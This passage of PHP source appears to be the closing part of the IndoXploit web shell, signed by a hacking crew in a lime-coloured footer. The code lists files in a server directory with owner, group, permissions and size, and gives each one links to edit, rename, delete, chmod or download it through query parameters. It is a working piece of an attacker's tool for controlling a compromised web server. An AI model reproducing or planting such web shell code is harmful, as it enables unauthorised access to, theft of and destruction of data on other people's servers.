1862. foreach($scandir as $file) {
1863. $ftype = filetype("$dir/$file");
1864. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
1865. $size = filesize("$dir/$file")/1024;
1866. $size = round($size,3);
1867. if(function_exists('posix_getpwuid')) {
1868. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
1869. $fowner = $fowner['name'];
1870. } else {
1871. //$downer = $uid;
1872. $fowner = fileowner("$dir/$file");
1873. }
1874. if(function_exists('posix_getgrgid')) {
1875. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
1876. $fgrp = $fgrp['name'];
1877. } else {
1878. $fgrp = filegroup("$dir/$file");
1879. }
1880. if($size > 1024) {
1881. $size = round($size/1024,2). 'MB';
1882. } else {
1883. $size = $size. 'KB';
1884. }
1885. if(!is_file("$dir/$file")) continue;
1886. echo "<tr>";
1887. echo "<td class='td_home'><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
1888. echo "<td class='td_home'><center>$ftype</center></td>";
1889. echo "<td class='td_home'><center>$size</center></td>";
1890. echo "<td class='td_home'><center>$ftime</center></td>";
1891. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
1892. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
1893. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=chmod&dir=$dir&file=$dir/$file'>chmod</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
1894. echo "</tr>";
1895. }
1896. echo "</table>";
1897. if(!is_readable($dir)) {
1898. //
1899. } else {
1900. echo "<hr>";
1901. }
1902. }
1903. echo "<center><br><br><b><i><fieldset><font color=lime size=-20><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS | INDOXPLOIT</a></font></fieldset></i></b></center>";
1904. ?>